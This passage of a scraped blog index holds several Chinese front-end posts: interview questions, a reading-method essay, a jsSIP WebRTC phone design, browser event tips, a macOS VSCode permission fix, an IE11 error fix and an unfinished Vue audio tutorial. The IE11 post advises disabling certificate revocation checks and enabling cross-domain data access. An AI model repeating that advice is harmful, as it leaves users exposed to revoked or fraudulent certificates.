aggregation: the aggregation pipeline, the map-reduce function, and single purpose aggregation methods.\n","permalink":"https://wdd.js.org/posts/2018/02/front-end-interview-handbook/","summary":"1. 问答题 1.1. HTML相关 1.1.1. 的作用是什么? 1.1.2. script, script async和script defer之间有什么区别? 1.1.3. cookie, sessionStorage 和 localStorage之间有什么区别? 1.1.4. 用过哪些html模板渲染工具? 1.2. CSS相关 1.2.1. 简述CSS盒子模型 1.2.2. CSS有哪些选择器? 1.2.3. CSS sprite是什么? 1.2.4. 写一下你知道的前端UI框架? 1.3. JS相关 1.3.1. js有哪些数据类型? 1.3.2. js有哪些假值? 1.3.3. js数字和字符串之间有什么快速转换的写法? 1.3.4. 经常使用哪些ES6的语法? 1.3.5. 什么是同源策略? 1.3.6. 跨域有哪些解决方法? 1.3.7. 
网页进度条实现的原理 1.3.8. 请问console.log是同步的,还是异步的? 1.3.9. 下面console输出的值是什么? var scores = [10,11,12]; var total = 0; for(var score in scores){ total += score; } var average = total/scores.length; console.log(average); 1.","title":"前端面试和笔试题目"},{"content":"床底下秘密 我是一个毅力不是很够的人。我曾经下定决心要锻炼身体,买了一些健身器材,例如瑜伽垫,仰卧起坐的器材,俯卧撑的器材。然而三分钟的热度过后,我把瑜伽垫卷了起来,塞到床底下。把仰卧起坐的器材拆开,也塞到了床底下。\n所以每次我都不敢看床底下,那里塞满了我的羞愧。我常常想,我这不就是永远睡在羞愧之上吗?\n那么,是什么让我放弃了自己的目标,慢慢活成了自己讨厌的样子呢?\n之前和朋友聊天,我们有一段时间没见了。我突然觉得他也太能聊了,说了很多我不知道的新鲜事,还有一些可以让人茅塞顿开的想法。完了之后,他劝我让我多读书。我觉得这个想法很好。我确实是需要读书了。毕竟我的床底下已经没有空间再塞其他的东西了。\n于是我在多看阅读上买了一些电子书,在京东上买了一些实体书,然后又买了一个kindle。在读书的过程中,有时候作者也会推荐你看一些其他的书。我给自己定了2018年我的阅读计划,给自己定下要看哪些书。\n看书的方法 当我决定要看书,并且为此付出了不少金钱的情况下,我是非常不愿意让我的金钱付出白白打水漂的,毕竟买书以及买设备,这不是免费的服务。于是我给自己制定了一个非常完善的定量阅读标准\n读书方法v1.0.0 版 如下\n每天至少看三本书 每本书看50页 人要有标准才能判断是否达标,没有标准,没有数字化的支撑,那是很难以持续的。比如说中国的菜谱,做某道菜中写了一句:加入少许盐。中国人看了会想,那我就按照口味随便加点盐吧。外国人就会被搞得非常迷糊,少许是多少克盐? 20g, 30g? 完全没有标准嘛。\n按照读书方法 v1.0.0版,我看了几天,这个效果是很好的。但是我很累,电子书50页可不是个小数目。有时候很难完成的。于是我必须要升级我的读书方法。\n读书方法v1.0.1 版 如下\n每天至少看三本书 每本书看10页 按照读书方法v1.0.1 版,我看了几天,虽然读书的进度很慢,但是我很容易有满足感,因为这个目标是很容易就达成的。因为你随便去上个厕所,看个10页电子书也是绰绰有余的。但是这个版本也有个问题。\n如果我今天看的这本书看得流连忘返,一不小心忘记看页码了,居然不知不觉读了38页,那么是不是已经消耗了未来几天的阅读量呢,明天这本书要不要读呢? 
所以,我要升级我的读书方法。\n读书方法v1.0.2版:\n每天至少读三本书 每本书至少读10页 我按照这个方法,感觉做得不错。每天都有一定的阅读量要看,而且阅读量不是很大,不会让我觉得很累。而且当我完成了这个目标,我是会获得不小的满足感。\n大目标分解成小目标去逐个击破,这是我这篇文章的核心观点。\n冲量公式 I = F x T 冲量是力的时间累积效应的量度,是矢量。如果物体所受的力是大小和方向都不变的恒力F,冲量I就是F和作用时间t的乘积。 冲量是描述力对物体作用的时间累积效应的物理量。力的冲量是一个过程量。在谈及冲量时,必须明确是哪个力在哪段时间上的冲量。\n个人好习惯的养成,不是一蹴而就的,而是类似于物理学冲量的概念:力在一段时间内的累积,是过程量\n三分钟的热度对应的冲量:I = F_max x T_min。使用很大的力,作用时间超短,基本上没啥效果,冲量趋近于零。\n微习惯对应的冲量:I = F_min x T_max。使用很小的力,做长时间的积累。冲量不会趋近于零,而是会慢慢增长,然后趋近于一个稳定水平。比如你给自己规定每天看1页书,但是大多数情况下,如果你做了看书的动作,基本上你看书的页数一定会大于1页。\n看什么样的书 我自己喜欢看计算机,心理学,历史人文方面的出版书籍。而我的选择标准有两个,符合任一一个,我都会去看。\n要有用。无论是对我的专业知识,还是对人际交往,金融理财等方面要有有益之处 要有趣。没趣的书我是断然不会去看的。 读书实际上是读人,一流作家写的一流的书,三流作家只能写出九流的书。\n","permalink":"https://wdd.js.org/posts/2018/02/small-is-better-than-big/","summary":"床底下秘密 我是一个毅力不是很够的人。我曾经下定决心要锻炼身体,买了一些健身器材,例如瑜伽垫,仰卧起坐的器材,俯卧撑的器材。然而三分钟的热度过后,我把瑜伽垫卷了起来,塞到床底下。把仰卧起坐的器材拆开,也塞到了床底下。\n所以每次我都不敢看床底下,那里塞满了我的羞愧。我常常想,我这不就是永远睡在羞愧之上吗?\n那么,是什么让我放弃了自己的目标,慢慢活成了自己讨厌的样子呢?\n之前和朋友聊天,我们有一段时间没见了。我突然觉得他也太能聊了,说了很多我不知道的新鲜事,还有一些可以让人茅塞顿开的想法。完了之后,他劝我让我多读书。我觉得这个想法很好。我确实是需要读书了。毕竟我的床底下已经没有空间再塞其他的东西了。\n于是我在多看阅读上买了一些电子书,在京东上买了一些实体书,然后又买了一个kindle。在读书的过程中,有时候作者也会推荐你看一些其他的书。我给自己定了2018年我的阅读计划,给自己定下要看哪些书。\n看书的方法 当我决定要看书,并且为此付出了不少金钱的情况下,我是非常不愿意让我的金钱付出白白打水漂的,毕竟买书以及买设备,这不是免费的服务。于是我给自己制定了一个非常完善的定量阅读标准\n读书方法v1.0.0 版 如下\n每天至少看三本书 每本书看50页 人要有标准才能判断是否达标,没有标准,没有数字化的支撑,那是很难以持续的。比如说中国的菜谱,做某道菜中写了一句:加入少许盐。中国人看了会想,那我就按照口味随便加点盐吧。外国人就会被搞得非常迷糊,少许是多少克盐? 20g, 30g? 完全没有标准嘛。\n按照读书方法 v1.0.0版,我看了几天,这个效果是很好的。但是我很累,电子书50页可不是个小数目。有时候很难完成的。于是我必须要升级我的读书方法。\n读书方法v1.0.1 版 如下\n每天至少看三本书 每本书看10页 按照读书方法v1.0.1 版,我看了几天,虽然读书的进度很慢,但是我很容易有满足感,因为这个目标是很容易就达成的。因为你随便去上个厕所,看个10页电子书也是绰绰有余的。但是这个版本也有个问题。\n如果我今天看的这本书看得流连忘返,一不小心忘记看页码了,居然不知不觉读了38页,那么是不是已经消耗了未来几天的阅读量呢,明天这本书要不要读呢? 
所以,我要升级我的读书方法。\n读书方法v1.0.2版:\n每天至少读三本书 每本书至少读10页 我按照这个方法,感觉做得不错。每天都有一定的阅读量要看,而且阅读量不是很大,不会让我觉得很累。而且当我完成了这个目标,我是会获得不小的满足感。\n大目标分解成小目标去逐个击破,这是我这篇文章的核心观点。\n冲量公式 I = F x T 冲量是力的时间累积效应的量度,是矢量。如果物体所受的力是大小和方向都不变的恒力F,冲量I就是F和作用时间t的乘积。 冲量是描述力对物体作用的时间累积效应的物理量。力的冲量是一个过程量。在谈及冲量时,必须明确是哪个力在哪段时间上的冲量。\n个人好习惯的养成,不是一蹴而就的,而是类似于物理学冲量的概念:力在一段时间内的累积,是过程量\n三分钟的热度对应的冲量:I = F_max x T_min。使用很大的力,作用时间超短,基本上没啥效果,冲量趋近于零。\n微习惯对应的冲量:I = F_min x T_max。使用很小的力,做长时间的积累。冲量不会趋近于零,而是会慢慢增长,然后趋近于一个稳定水平。比如你给自己规定每天看1页书,但是大多数情况下,如果你做了看书的动作,基本上你看书的页数一定会大于1页。\n看什么样的书 我自己喜欢看计算机,心理学,历史人文方面的出版书籍。而我的选择标准有两个,符合任一一个,我都会去看。\n要有用。无论是对我的专业知识,还是对人际交往,金融理财等方面要有有益之处 要有趣。没趣的书我是断然不会去看的。 读书实际上是读人,一流作家写的一流的书,三流作家只能写出九流的书。","title":"small is better than big 我的读书方法论"},{"content":"0 阅前须知 本文并不是教程,只是实现方案 我只是从WEB端考虑这个问题,实际还需要后端sip服务器的配合 jsSIP有个非常不错的在线demo, 可以去哪里玩耍,很好玩呢 try jssip 1. 技术简介 WebRTC: WebRTC,名称源自网页即时通信(英语:Web Real-Time Communication)的缩写,是一个支持网页浏览器进行实时语音对话或视频对话的API。它于2011年6月1日开源并在Google、Mozilla、Opera支持下被纳入万维网联盟的W3C推荐标准 SIP: 会话发起协议(Session Initiation Protocol,缩写SIP)是一个由IETF MMUSIC工作组开发的协议,作为标准被提议用于创建,修改和终止包括视频,语音,即时通信,在线游戏和虚拟现实等多种多媒体元素在内的交互式用户会话。2000年11月,SIP被正式批准成为3GPP信号协议之一,并成为IMS体系结构的一个永久单元。SIP与H.323一样,是用于VoIP最主要的信令协议之一。 一般来说,要么使用实体话机,要么在系统上安装基于sip的客户端程序。实体话机硬件成本高,基于sip的客户端往往兼容性差,无法跨平台,易被杀毒软件查杀。\n而WebRTC或许是更好的解决方案,只要一个浏览器就可以实时语音视频通话,这是很不错的解决方案。WebSocket可以用来传递sip信令,而WebRTC用来实时传输语音视频流。\n2. 
前端WebRTC实现方案 其实我们不需要去自己处理WebRTC的相关方法,或者去处理视频或者媒体流。市面上已经有不错的模块可供选择。\n2.1 jsSIP jsSIP是JavaScript SIP 库\n功能特点如下:\n可以在浏览器或者Nodejs中运行 使用WebSocket传递SIP协议 视频音频实时消息使用WebRTC 非常轻量 100%纯JavaScript 使用简单并且具有强大的Api 服务端支持 OverSIP, Kamailio, Asterisk, OfficeSIP,reSIProcate,Frafos ABC SBC,TekSIP 是RFC 7118 and OverSIP的作者写的 下面是使用JsSIP打电话的例子,非常简单吧\n// Create our JsSIP instance and run it: var socket = new JsSIP.WebSocketInterface(\u0026#39;wss://sip.myhost.com\u0026#39;); var configuration = { sockets : [ socket ], uri : \u0026#39;sip:alice@example.com\u0026#39;, password : \u0026#39;superpassword\u0026#39; }; var ua = new JsSIP.UA(configuration); ua.start(); // Register callbacks to desired call events var eventHandlers = { \u0026#39;progress\u0026#39;: function(e) { console.log(\u0026#39;call is in progress\u0026#39;); }, \u0026#39;failed\u0026#39;: function(e) { console.log(\u0026#39;call failed with cause: \u0026#39;+ e.data.cause); }, \u0026#39;ended\u0026#39;: function(e) { console.log(\u0026#39;call ended with cause: \u0026#39;+ e.data.cause); }, \u0026#39;confirmed\u0026#39;: function(e) { console.log(\u0026#39;call confirmed\u0026#39;); } }; var options = { \u0026#39;eventHandlers\u0026#39; : eventHandlers, \u0026#39;mediaConstraints\u0026#39; : { \u0026#39;audio\u0026#39;: true, \u0026#39;video\u0026#39;: true } }; var session = ua.call(\u0026#39;sip:bob@example.com\u0026#39;, options); 2.2 SIP.js sip.js项目实际是fork自jsSIP的,这里主要介绍它的服务端支持情况。其他接口自己自行查阅\nFreeSWITCH Asterisk OnSIP FreeSWITCH Legacy 3. 
平台考量 由于WebRTC对浏览器有较高的要求,你可以看看下图,哪些浏览器支持WebRTC, 所有IE浏览器都不行,chrome系支持情况不错。\n3.1 考量标准 跨平台 兼容性 体积 集成性 硬件要求 开发成本 3.2 考量表格 种类 适用平台 优点 缺点 基于electron开发的桌面客户端 window, mac, linux 跨平台,兼容好 要下载安装,体积大(压缩后至少48MB),对电脑性能有要求 开发js sdk 现代浏览器 体积小,容易第三方集成 兼容差(因为涉及到webRTC, IE11以及以都不行,对宿主环境要求高),客户集成需要开发量 开发谷歌浏览器扩展 谷歌浏览器 体积小 兼容差(仅限类chrome浏览器) 4 参考文档 and 延伸阅读 and 动手实践 Js SIP Getting Started 120行代码实现 浏览器WebRTC视频聊天 SIP协议状态码: 5 常见问题 422: \u0026ldquo;Session Interval Too Small\u0026rdquo; jsSIP默认携带Session-Expires: 90的头部信息,如果这个超时字段小于服务端的设定值,那么就会得到如下422的响应。参见SIP协议状态码:, 可以在call请求中设置sessionTimersExpires, 使其超过服务端的设定值即可\ncall(targer, options ) option.sessionTimersExpires Number (in seconds) for the default Session Timers interval (default value is 90, do not set a lower value). 6 最后,你我共勉 ","permalink":"https://wdd.js.org/posts/2018/02/webrtc-web-sip-phone/","summary":"0 阅前须知 本文并不是教程,只是实现方案 我只是从WEB端考虑这个问题,实际还需要后端sip服务器的配合 jsSIP有个非常不错的在线demo, 可以去哪里玩耍,很好玩呢 try jssip 1. 技术简介 WebRTC: WebRTC,名称源自网页即时通信(英语:Web Real-Time Communication)的缩写,是一个支持网页浏览器进行实时语音对话或视频对话的API。它于2011年6月1日开源并在Google、Mozilla、Opera支持下被纳入万维网联盟的W3C推荐标准 SIP: 会话发起协议(Session Initiation Protocol,缩写SIP)是一个由IETF MMUSIC工作组开发的协议,作为标准被提议用于创建,修改和终止包括视频,语音,即时通信,在线游戏和虚拟现实等多种多媒体元素在内的交互式用户会话。2000年11月,SIP被正式批准成为3GPP信号协议之一,并成为IMS体系结构的一个永久单元。SIP与H.323一样,是用于VoIP最主要的信令协议之一。 一般来说,要么使用实体话机,要么在系统上安装基于sip的客户端程序。实体话机硬件成本高,基于sip的客户端往往兼容性差,无法跨平台,易被杀毒软件查杀。\n而WebRTC或许是更好的解决方案,只要一个浏览器就可以实时语音视频通话,这是很不错的解决方案。WebSocket可以用来传递sip信令,而WebRTC用来实时传输语音视频流。\n2. 
前端WebRTC实现方案 其实我们不需要去自己处理WebRTC的相关方法,或者去处理视频或者媒体流。市面上已经有不错的模块可供选择。\n2.1 jsSIP jsSIP是JavaScript SIP 库\n功能特点如下:\n可以在浏览器或者Nodejs中运行 使用WebSocket传递SIP协议 视频音频实时消息使用WebRTC 非常轻量 100%纯JavaScript 使用简单并且具有强大的Api 服务端支持 OverSIP, Kamailio, Asterisk, OfficeSIP,reSIProcate,Frafos ABC SBC,TekSIP 是RFC 7118 and OverSIP的作者写的 下面是使用JsSIP打电话的例子,非常简单吧\n// Create our JsSIP instance and run it: var socket = new JsSIP.WebSocketInterface(\u0026#39;wss://sip.myhost.com\u0026#39;); var configuration = { sockets : [ socket ], uri : \u0026#39;sip:alice@example.","title":"基于 WebRTC 构建 Web SIP Phone"},{"content":"1 visibilitychange事件 触发条件:浏览器标签页被隐藏或显示的时候会触发visibilitychange事件.\n使用场景:当标签页显示或者隐藏时,触发一些业务逻辑\ndocument.addEventListener(\u0026#34;visibilitychange\u0026#34;, function() { console.log( document.visibilityState ); }); 2 storage事件 触发条件:使用localStorage or sessionStorage存储或者修改某个本地存储时\n使用场景:标签页间通信\n// AB页面同源 // 在A 页面 window.addEventListener(\u0026#39;storage\u0026#39;, (e) =\u0026gt; {console.log(e)}) // 在B 页面,向120打个电话 localStorage.setItem(\u0026#39;makeCall\u0026#39;,\u0026#39;120\u0026#39;) // 然后可以在A页面看到输出, 可以看出A页面收到了B页面的通知 ...key: \u0026#34;makeCall\u0026#34;, oldValue: \u0026#34;119\u0026#34;, newValue: \u0026#34;120\u0026#34;, ... 3 beforeunload事件 触发条件:当页面的资源将要卸载(即刷新或者关闭标签页前). 
当页面依然可见,并且该事件可以被取消时\n使用场景:关闭或者刷新页面时弹窗确认,关闭页面时向后端发送报告等\nwindow.addEventListener(\u0026#34;beforeunload\u0026#34;, function (e) { var confirmationMessage = \u0026#34;\\o/\u0026#34;; e.returnValue = confirmationMessage; // Gecko, Trident, Chrome 34+ return confirmationMessage; // Gecko, WebKit, Chrome \u0026lt;34 }); 4 navigator.sendBeacon 这个方法主要用于满足 统计和诊断代码 的需要,这些代码通常尝试在卸载(unload)文档之前向web服务器发送数据。过早的发送数据可能导致错过收集数据的机会。然而, 对于开发者来说保证在文档卸载期间发送数据一直是一个困难。因为用户代理通常会忽略在卸载事件处理器中产生的异步 XMLHttpRequest 。\n使用 sendBeacon() 方法,将会使用户代理在有机会时异步地向服务器发送数据,同时不会延迟页面的卸载或影响下一导航的载入性能。这就解决了提交分析数据时的所有的问题:使它可靠,异步并且不会影响下一页面的加载。此外,代码实际上还要比其他技术简单!\n注意:该方法在IE和safari没有实现\n使用场景:发送崩溃报告\nwindow.addEventListener(\u0026#39;unload\u0026#39;, logData, false); function logData() { navigator.sendBeacon(\u0026#34;/log\u0026#34;, analyticsData); } ","permalink":"https://wdd.js.org/posts/2018/02/useful-browser-events/","summary":"1 visibilitychange事件 触发条件:浏览器标签页被隐藏或显示的时候会触发visibilitychange事件.\n使用场景:当标签页显示或者隐藏时,触发一些业务逻辑\ndocument.addEventListener(\u0026#34;visibilitychange\u0026#34;, function() { console.log( document.visibilityState ); }); 2 storage事件 触发条件:使用localStorage or sessionStorage存储或者修改某个本地存储时\n使用场景:标签页间通信\n// AB页面同源 // 在A 页面 window.addEventListener(\u0026#39;storage\u0026#39;, (e) =\u0026gt; {console.log(e)}) // 在B 页面,向120打个电话 localStorage.setItem(\u0026#39;makeCall\u0026#39;,\u0026#39;120\u0026#39;) // 然后可以在A页面看到输出, 可以看出A页面收到了B页面的通知 ...key: \u0026#34;makeCall\u0026#34;, oldValue: \u0026#34;119\u0026#34;, newValue: \u0026#34;120\u0026#34;, ... 3 beforeunload事件 触发条件:当页面的资源将要卸载(即刷新或者关闭标签页前). 当页面依然可见,并且该事件可以被取消时\n使用场景:关闭或者刷新页面时弹窗确认,关闭页面时向后端发送报告等\nwindow.addEventListener(\u0026#34;beforeunload\u0026#34;, function (e) { var confirmationMessage = \u0026#34;\\o/\u0026#34;; e.returnValue = confirmationMessage; // Gecko, Trident, Chrome 34+ return confirmationMessage; // Gecko, WebKit, Chrome \u0026lt;34 }); 4 navigator.","title":"不常用却很有妙用的事件及方法"},{"content":"0. 
现象 Could not create temporary directory: Permission denied\n1. 问题起因 在 /Users/username/Library/Caches/目录下,有以下两个文件, 可以看到,它们两个的用户是不一样的,一个是root一个username, 一般来说,我是以username来使用我的mac的。就是因为这两个文件的用户不一样,导致了更新失败。\ndrwxr-xr-x 6 username staff 204B Jan 17 20:33 com.microsoft.VSCode drwxr--r-- 2 root staff 68B Dec 17 13:51 com.microsoft.VSCode.ShipIt 2. 解决方法 注意: 先把vscode 完全关闭\n// 1. 这一步是需要输入密码的 sudo chown $USER ~/Library/Caches/com.microsoft.VSCode.ShipIt/ // 2. 这一步是不需要输入密码的, 如果不进行第一步,第二步会报错 sudo chown $USER ~/Library/Caches/com.microsoft.VSCode.ShipIt/* // 3. 更新xattr xattr -dr com.apple.quarantine /Applications/Visual\\ Studio\\ Code.app 3. 打开vscode Code \u0026gt; Check for Updates, 点击之后,你会发现Check for Updates已经变成灰色了,那么你需要稍等片刻,马上就可以更新,之后会跳出提示,让你重启vscode, 然后重启一下vscode, 就ok了。\n4. 参考 joaomoreno commented on Feb 7, 2017 • edited ","permalink":"https://wdd.js.org/posts/2018/02/mac-vscode-update-permission-denied/","summary":"0. 现象 Could not create temporary directory: Permission denied\n1. 问题起因 在 /Users/username/Library/Caches/目录下,有以下两个文件, 可以看到,它们两个的用户是不一样的,一个是root一个username, 一般来说,我是以username来使用我的mac的。就是因为这两个文件的用户不一样,导致了更新失败。\ndrwxr-xr-x 6 username staff 204B Jan 17 20:33 com.microsoft.VSCode drwxr--r-- 2 root staff 68B Dec 17 13:51 com.microsoft.VSCode.ShipIt 2. 解决方法 注意: 先把vscode 完全关闭\n// 1. 这一步是需要输入密码的 sudo chown $USER ~/Library/Caches/com.microsoft.VSCode.ShipIt/ // 2. 这一步是不需要输入密码的, 如果不进行第一步,第二步会报错 sudo chown $USER ~/Library/Caches/com.microsoft.VSCode.ShipIt/* // 3. 更新xattr xattr -dr com.apple.quarantine /Applications/Visual\\ Studio\\ Code.app 3. 打开vscode Code \u0026gt; Check for Updates, 点击之后,你会发现Check for Updates已经变成灰色了,那么你需要稍等片刻,马上就可以更新,之后会跳出提示,让你重启vscode, 然后重启一下vscode, 就ok了。","title":"mac vscode 更新失败 Permission denied解决办法"},{"content":"一千个IE浏览器访问同一个页面,可能报一千种错误。前端激进派对IE恨得牙痒痒,但是无论你爱,或者不爱,IE就在那里,不来不去。\n一些银行,以及政府部门,往往都是指定必须使用IE浏览器。所以,就会有一些仅在IE浏览器上出现的问题。总结起来问题的原因很简单:IE的配置不正确\n下面就讲一个我曾经遇到的问题: IE11 0x2ee4, 以及其他问题的解决方案\n1. 
IE11 SCRIPT7002: XMLHttpRequest: 网络错误 0x2ee4 背景介绍:在一个HTTPS域向另外一个HTTPS域发送跨域POST请求时\n这个问题在浏览器的输出内容如下,怪异的是,并不是所有IE11都会报这个错误。\nSCRIPT7002: XMLHttpRequest: 网络错误 0x2ee4, 由于出现错误 00002ee4 而导致此项操作无法完成 stackoverflow上有个答案,它的思路是:在post请求发送之前,先进行一次get操作 这个方式我试过,是可行的。但是深层次的原因我不是很明白。\n然而真相总有大白的一天,其实深层次的原因是,IE11的配置。\n去掉证书吊销的检查,解决0x2ee4的问题\n解决方法\n去掉check for server certificate revocation*, 也有可能你那边是中文翻译的:叫检查服务器证书是否已吊销 去掉检查发行商证书是否已吊销 点击确定 重启计算机 2 其他常规设置 2.1 去掉兼容模式, 使用Edge文档模式 下图中红色框里的按钮也要取消勾选 2.2 有些使用activeX,还是需要检查是否启用的 2.3 允许跨域 如果你的接口跨域了,还要检查浏览器是否允许跨域,否则浏览器可能默认就禁止跨域的\n设置方法\ninternet选项 安全 自定义级别 启用通过跨域访问数据源 启用跨域浏览窗口和框架 确定 然后重启电脑 ","permalink":"https://wdd.js.org/posts/2018/02/ie11-0x2ee4-bug/","summary":"一千个IE浏览器访问同一个页面,可能报一千种错误。前端激进派对IE恨得牙痒痒,但是无论你爱,或者不爱,IE就在那里,不来不去。\n一些银行,以及政府部门,往往都是指定必须使用IE浏览器。所以,就会有一些仅在IE浏览器上出现的问题。总结起来问题的原因很简单:IE的配置不正确\n下面就讲一个我曾经遇到的问题: IE11 0x2ee4, 以及其他问题的解决方案\n1. IE11 SCRIPT7002: XMLHttpRequest: 网络错误 0x2ee4 背景介绍:在一个HTTPS域向另外一个HTTPS域发送跨域POST请求时\n这个问题在浏览器的输出内容如下,怪异的是,并不是所有IE11都会报这个错误。\nSCRIPT7002: XMLHttpRequest: 网络错误 0x2ee4, 由于出现错误 00002ee4 而导致此项操作无法完成 stackoverflow上有个答案,它的思路是:在post请求发送之前,先进行一次get操作 这个方式我试过,是可行的。但是深层次的原因我不是很明白。\n然而真相总有大白的一天,其实深层次的原因是,IE11的配置。\n去掉证书吊销的检查,解决0x2ee4的问题\n解决方法\n去掉check for server certificate revocation*, 也有可能你那边是中文翻译的:叫检查服务器证书是否已吊销 去掉检查发行商证书是否已吊销 点击确定 重启计算机 2 其他常规设置 2.1 去掉兼容模式, 使用Edge文档模式 下图中红色框里的按钮也要取消勾选 2.2 有些使用activeX,还是需要检查是否启用的 2.3 允许跨域 如果你的接口跨域了,还要检查浏览器是否允许跨域,否则浏览器可能默认就禁止跨域的\n设置方法\ninternet选项 安全 自定义级别 启用通过跨域访问数据源 启用跨域浏览窗口和框架 确定 然后重启电脑 ","title":"IE11 0x2ee4 bug 以及类似问题解决方法"},{"content":"1. 简介 1.1. 相关技术 Vue Vue-cli ElementUI yarn (之前我用npm, 并使用cnpm的源,但是用了yarn之后,我发现它比cnpm的速度还快,功能更好,我就毫不犹豫选择yarn了) Audio相关API和事件 1.2. 从本教程你会学到什么? Vue单文件组件开发知识 Element UI基本用法 Audio原生API及Audio相关事件 音频播放器的基本原理 音频的播放暂停控制 更新音频显示时间 音频进度条控制与跳转 音频音量控制 音频播放速度控制 音频静音控制 音频下载控制 个性化配置与排他性播放 一点点ES6语法 2. 学前准备 基本上不需要什么准备,但是如果你能先看一下Audio相关API和事件将会更好\nAudio: 如果你愿意一层一层剥开我的心 使用 HTML5 音频和视频 3. 在线demo 没有在线demo的教程都是耍流氓\n查看在线demo 项目地址 4. 开始编码 5. 
项目初始化 ➜ test vue init webpack element-audio A newer version of vue-cli is available. latest: 2.9.2 installed: 2.9.1 ? Project name element-audio ? Project description A Vue.js project ? Author wangdd \u0026lt;wangdd@xxxxxx.com\u0026gt; ? Vue build standalone ? Install vue-router? No ? Use ESLint to lint your code? No ? Set up unit tests No ? Setup e2e tests with Nightwatch? No ? Should we run `npm install` for you after the project has been created? (recommended) npm ➜ test cd element-audio ➜ element-audio npm run dev 浏览器打开 http://localhost:8080/, 看到如下界面,说明项目初始化成功\n5.1. 安装ElementUI并插入audio标签 5.1.1. 安装ElementUI yarn add element-ui // or npm i element-ui -S 5.1.2. 在src/main.js中引入Element UI // filename: src/main.js import Vue from \u0026#39;vue\u0026#39; import ElementUI from \u0026#39;element-ui\u0026#39; import App from \u0026#39;./App\u0026#39; import \u0026#39;element-ui/lib/theme-chalk/index.css\u0026#39; Vue.config.productionTip = false Vue.use(ElementUI) /* eslint-disable no-new */ new Vue({ el: \u0026#39;#app\u0026#39;, template: \u0026#39;\u0026lt;App/\u0026gt;\u0026#39;, components: { App } }) 5.1.3. 创建src/components/VueAudio.vue // filename: src/components/VueAudio.vue \u0026lt;template\u0026gt; \u0026lt;div\u0026gt; \u0026lt;audio src=\u0026#34;http://devtest.qiniudn.com/secret base~.mp3\u0026#34; controls=\u0026#34;controls\u0026#34;\u0026gt;\u0026lt;/audio\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;script\u0026gt; export default { data () { return {} } } \u0026lt;/script\u0026gt; \u0026lt;style\u0026gt; \u0026lt;/style\u0026gt; 5.1.4. 
修改src/App.vue, 并引入VueAudio.vue组件 // filename: src/App.vue \u0026lt;template\u0026gt; \u0026lt;div id=\u0026#34;app\u0026#34;\u0026gt; \u0026lt;VueAudio /\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;script\u0026gt; import VueAudio from \u0026#39;./components/VueAudio\u0026#39; export default { name: \u0026#39;app\u0026#39;, components: { VueAudio }, data () { return {} } } \u0026lt;/script\u0026gt; \u0026lt;style\u0026gt; \u0026lt;/style\u0026gt; 打开:http://localhost:8080/,你应该能看到如下效果,说明引入成功,你可以点击播放按钮看看,音频是否能够播放 5.2. 音频的播放暂停控制 我们需要用一个按钮去控制音频的播放与暂停,这里调用了audio的两个api,以及两个事件\naudio.play() audio.pause() play事件 pause事件 修改src/components/VueAudio.vue\n// filename: src/components/VueAudio.vue \u0026lt;template\u0026gt; \u0026lt;div\u0026gt; \u0026lt;!-- 此处的ref属性,可以很方便的在vue组件中通过 this.$refs.audio获取该dom元素 --\u0026gt; \u0026lt;audio ref=\u0026#34;audio\u0026#34; @pause=\u0026#34;onPause\u0026#34; @play=\u0026#34;onPlay\u0026#34; src=\u0026#34;http://devtest.qiniudn.com/secret base~.mp3\u0026#34; controls=\u0026#34;controls\u0026#34;\u0026gt;\u0026lt;/audio\u0026gt; \u0026lt;!-- 音频播放控件 --\u0026gt; \u0026lt;div\u0026gt; \u0026lt;el-button type=\u0026#34;text\u0026#34; @click=\u0026#34;startPlayOrPause\u0026#34;\u0026gt;{{audio.playing | transPlayPause}}\u0026lt;/el-button\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;script\u0026gt; export default { data () { return { audio: { // 该字段是音频是否处于播放状态的属性 playing: false } } }, methods: { // 控制音频的播放与暂停 startPlayOrPause () { return this.audio.playing ? this.pause() : this.play() }, // 播放音频 play () { this.$refs.audio.play() }, // 暂停音频 pause () { this.$refs.audio.pause() }, // 当音频播放 onPlay () { this.audio.playing = true }, // 当音频暂停 onPause () { this.audio.playing = false } }, filters: { // 使用组件过滤器来动态改变按钮的显示 transPlayPause(value) { return value ? 
\u0026#39;暂停\u0026#39; : \u0026#39;播放\u0026#39; } } } \u0026lt;/script\u0026gt; \u0026lt;style\u0026gt; \u0026lt;/style\u0026gt; 5.3. 音频显示时间 音频的时间显示主要有两部分,音频的总时长和当前播放时间。可以从两个事件中获取\nloadedmetadata:代表音频的元数据已经被加载完成,可以从中获取音频总时长 timeupdate: 当前播放位置作为正常播放的一部分而改变,或者以特别有趣的方式,例如不连续地改变,可以从该事件中获取音频的当前播放时间,该事件在播放过程中会不断被触发 要点代码:整数格式化成时:分:秒\nfunction realFormatSecond(second) { var secondType = typeof second if (secondType === \u0026#39;number\u0026#39; || secondType === \u0026#39;string\u0026#39;) { second = parseInt(second) var hours = Math.floor(second / 3600) second = second - hours * 3600 var mimute = Math.floor(second / 60) second = second - mimute * 60 return hours + \u0026#39;:\u0026#39; + (\u0026#39;0\u0026#39; + mimute).slice(-2) + \u0026#39;:\u0026#39; + (\u0026#39;0\u0026#39; + second).slice(-2) } else { return \u0026#39;0:00:00\u0026#39; } } 要点代码: 两个事件的处理\n// 当timeupdate事件大概每秒一次,用来更新音频流的当前播放时间 onTimeupdate(res) { console.log(\u0026#39;timeupdate\u0026#39;) console.log(res) this.audio.currentTime = res.target.currentTime }, // 当加载语音流元数据完成后,会触发该事件的回调函数 // 语音元数据主要是语音的长度之类的数据 onLoadedmetadata(res) { console.log(\u0026#39;loadedmetadata\u0026#39;) console.log(res) this.audio.maxTime = parseInt(res.target.duration) } 完整代码\n\u0026lt;template\u0026gt; \u0026lt;div\u0026gt; \u0026lt;!-- 此处的ref属性,可以很方便的在vue组件中通过 this.$refs.audio获取该dom元素 --\u0026gt; \u0026lt;audio ref=\u0026#34;audio\u0026#34; @pause=\u0026#34;onPause\u0026#34; @play=\u0026#34;onPlay\u0026#34; @timeupdate=\u0026#34;onTimeupdate\u0026#34; @loadedmetadata=\u0026#34;onLoadedmetadata\u0026#34; src=\u0026#34;http://devtest.qiniudn.com/secret base~.mp3\u0026#34; controls=\u0026#34;controls\u0026#34;\u0026gt;\u0026lt;/audio\u0026gt; \u0026lt;!-- 音频播放控件 --\u0026gt; \u0026lt;div\u0026gt; \u0026lt;el-button type=\u0026#34;text\u0026#34; 